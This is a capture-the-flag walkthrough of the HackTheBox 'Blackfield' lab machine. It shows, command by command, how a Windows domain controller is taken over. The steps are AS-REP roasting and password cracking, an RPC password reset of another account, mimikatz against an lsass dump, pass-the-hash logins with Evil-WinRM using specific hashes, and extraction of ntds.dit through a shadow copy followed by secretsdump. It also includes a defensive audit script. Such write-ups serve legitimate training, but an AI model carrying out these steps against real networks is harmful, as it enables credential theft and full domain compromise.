24. HackTheBox. Level Hard: Blackfield Walkthrough. Domain Controller Capture via SMB and RPC, LPE via Shadow Copy

2 January 2025 5 minutes Author: Lady Liberty

The Blackfield challenge on HackTheBox is perfect for improving your pentesting skills. You will learn how to use nmap, work with Active Directory, and escalate privileges on Windows systems using mimikatz and Evil-WinRM.

Quick guide

The article describes the use of ASRep Roasting to identify users, the use of RPC to change passwords and capture accounts, and the elevation of privilege using the shadow copy of NTDS.DIT.

The connection to the lab is via VPN. For security reasons, it is not recommended to use a work computer or devices with sensitive data, as the connection is to a private network with experienced information security professionals.

Recon

This machine has an IP address of 10.10.10.192, which I add to /etc/hosts.

10.10.10.192 	blackfield.htb

First, open ports are scanned using a script that accepts one argument — the host address to scan:

#!/bin/bash
# Full TCP port sweep, then a detailed scan (-A) of only the ports found open.
# Quoting "$1" and "$ports" keeps the script correct for unusual arguments.
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"

We see a lot of open ports, but as always, let’s start with SMB.

smbmap -u anonymous -H 10.10.10.192

And the profiles$ directory is available for reading.

smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'

We have a large list of possible users. We can check which of them actually exist in the domain. The reason is that during an ASRep Roasting attempt the KDC (the domain controller) returns one of three different responses:

  • an AS-REP containing material encrypted with the user’s password hash (pre-authentication is not required for that account);

  • the user exists but does not have the UF_DONT_REQUIRE_PREAUTH flag set, so pre-authentication is required;

  • the user does not exist in the Kerberos database.

That way, we can find out who is there and who is not.
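From the defender’s side, the condition that makes the first response possible is a single bit in the account’s userAccountControl attribute, and the write-up later relies on group membership (Remote Management Users, Backup Operators) for its next steps. The following is an added example, not code from the original walkthrough: it audits a constructed export of user objects for accounts that do not require Kerberos pre-authentication and for members of those two groups. The flag values are the documented Microsoft userAccountControl bits; the user rows and the DN layout are assumptions made up for the example.

```python
# Added example (not part of the original walkthrough): audit exported AD user
# objects for the two conditions this write-up relies on. The userAccountControl
# bit values are the documented Microsoft flag values; the user records are
# constructed sample data, not output from the lab machine.

UF_ACCOUNTDISABLE = 0x0002          # account is disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000  # Kerberos pre-authentication not required

# Constructed sample rows, shaped like an LDAP export of sAMAccountName,
# userAccountControl and memberOf. Names are illustrative.
SAMPLE_USERS = [
    {"sAMAccountName": "support", "userAccountControl": 0x400200, "memberOf": []},
    {"sAMAccountName": "audit2020", "userAccountControl": 0x200, "memberOf": []},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200,
     "memberOf": ["CN=Backup Operators,CN=Builtin,DC=blackfield,DC=local",
                  "CN=Remote Management Users,CN=Builtin,DC=blackfield,DC=local"]},
    # disabled account that still carries the pre-auth exemption
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202, "memberOf": []},
]

# Groups whose membership grants remote access (WinRM) or SeBackupPrivilege.
WATCHED_GROUPS = {"Backup Operators", "Remote Management Users"}


def group_cn(dn):
    """Return the CN of the first RDN of a distinguished name ("CN=X,CN=..." -> "X")."""
    first = dn.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def preauth_exempt(users, include_disabled=False):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set.

    Such accounts answer an AS-REQ without pre-authentication, which is exactly
    what makes AS-REP roasting possible. Disabled accounts are skipped by default
    because the KDC will not issue them a ticket anyway, but they are still worth
    cleaning up, hence the include_disabled switch.
    """
    found = []
    for u in users:
        uac = u["userAccountControl"]
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(u["sAMAccountName"])
    return sorted(found)


def watched_group_members(users, groups=WATCHED_GROUPS):
    """Map account name -> sorted list of watched groups it belongs to."""
    result = {}
    for u in users:
        hits = sorted(g for g in (group_cn(dn) for dn in u["memberOf"]) if g in groups)
        if hits:
            result[u["sAMAccountName"]] = hits
    return result


if __name__ == "__main__":
    print("pre-auth exempt (enabled):", preauth_exempt(SAMPLE_USERS))
    print("pre-auth exempt (incl. disabled):", preauth_exempt(SAMPLE_USERS, include_disabled=True))
    print("watched group members:", watched_group_members(SAMPLE_USERS))
```

In a real audit the rows would come from an LDAP query for the three attributes; the remediation for the first list is simply clearing the "Do not require Kerberos preauthentication" option on the account, and the second list is the set of accounts whose credentials deserve the most protection.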

Entry Point

First, let’s get a list.

smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt

Now let’s perform ASRep-Roasting.

GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt

It was unexpected to get a hash in response. The next step is to crack it.

john support.hash -w=./tools/rockyou.txt

Now we have a full account under control. Let’s gather as much information as possible using enum4linux.

enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null

The dump produces a large list of users, but the most valuable information is the group membership. In particular, it turned out that the svc_backup account belongs to the Remote Management Users group (RID 580), which allows remote connection via WinRM.

The data from SMB no longer contains useful information, and LDAP also does not provide anything valuable. However, RPC turned out to be useful due to one feature. The next step is to connect to it:

rpcclient 10.10.10.192 -U support

The feature in question is that the setuserinfo2 call lets an account reset another user’s password if it holds the password-reset right over that account. This method is described in detail in the sources and was successfully applied to the user audit2020.

setuserinfo2 audit2020 18 'ralf'

Now we start analyzing all resources and services from the beginning, because we have another controlled account.

USER

Let’s go to SMB.

smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192

There is a lot to read, so it is better to list all the content recursively and view it in one go.

smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R

In the forensic\memory_analysis folder we find, apparently, a dump of the lsass process. And from it we can get passwords using mimikatz. We download this file.

smbclient.py blackfield.local/audit2020:ralf@10.10.10.192

Now let’s switch to a Windows machine and run mimikatz against the dump.

Knowing the NTLM hash, we use Evil-WinRM to connect as svc_backup.

evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

ROOT

Let’s look at the user’s groups and privileges.

We have the SeBackupPrivilege privilege. This gives us the right to create a shadow copy of the volume holding the NTDS file, which contains the credentials of every domain account. Even once the copy exists, the required file cannot simply be copied out with normal tools; for that we will need the DLL libraries behind the Copy-FileSebackupPrivilege cmdlet used below.

Let’s make a shadow copy. First, create a diskshadow script file (ds.txt) with the following contents.

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias ralfcopy
create
expose %ralfcopy% z:

And now let’s upload it and the downloaded libraries to the host.

Let’s perform a shadow copy.

diskshadow /s ds.txt

And we copy the file out of the shadow copy.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

The file is encrypted, and to decrypt it you need the SYSTEM registry hive (it holds the boot key), which is easy to obtain.

reg save HKLM\SYSTEM C:\Temp\SYSTEM

We download both files from the machine.

We extract the hashes using the secretsdump utility from the impacket package.

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Let’s connect as an administrator.

evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

Full control over this machine has been obtained.

Conclusion

The use of ASRep Roasting for user identification, RPC for password change, secretsdump from impacket for hash extraction, and working with a shadow copy of NTDS.DIT were demonstrated. The approaches covered showed technical competence in the field of pentesting and information security.
